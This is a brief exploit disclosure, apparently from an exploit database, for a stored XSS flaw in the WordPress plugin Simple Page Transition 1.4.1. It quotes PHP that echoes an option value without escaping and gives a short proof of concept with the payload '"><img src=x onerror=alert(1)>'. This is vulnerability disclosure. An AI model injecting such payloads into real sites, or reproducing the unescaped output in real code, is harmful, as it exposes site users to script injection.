Share
## https://sploitus.com/exploit?id=1337DAY-ID-37813
# Exploit Title: WordPress Plugin ā€˜Simple Page Transitionā€™  - Stored Cross
Site Scripting
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/
# Version: 1.4.1
# Tested on: Firefox
# Contact me: [emailĀ protected]


*#Vulnerable code*:

```
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download
Links', 'spt' ); ?></label><br />
<input type="text" id="simple_page_transition_ignored"
name="simple_page_transition_ignored" value="*<?php print
$simple_page_transition_ignored; ?>*" /><br />

```
*#POC:*

1- Install the plugin ā€˜simple page transitionā€™ & activate it.
2- Navigate towards the ā€œignored download linksā€
3- Enter the XSS payload ` *ā€œ><img src=x onerror=alert(1)>*`

*#POC image:*

https://imgur.com/yzaTkhi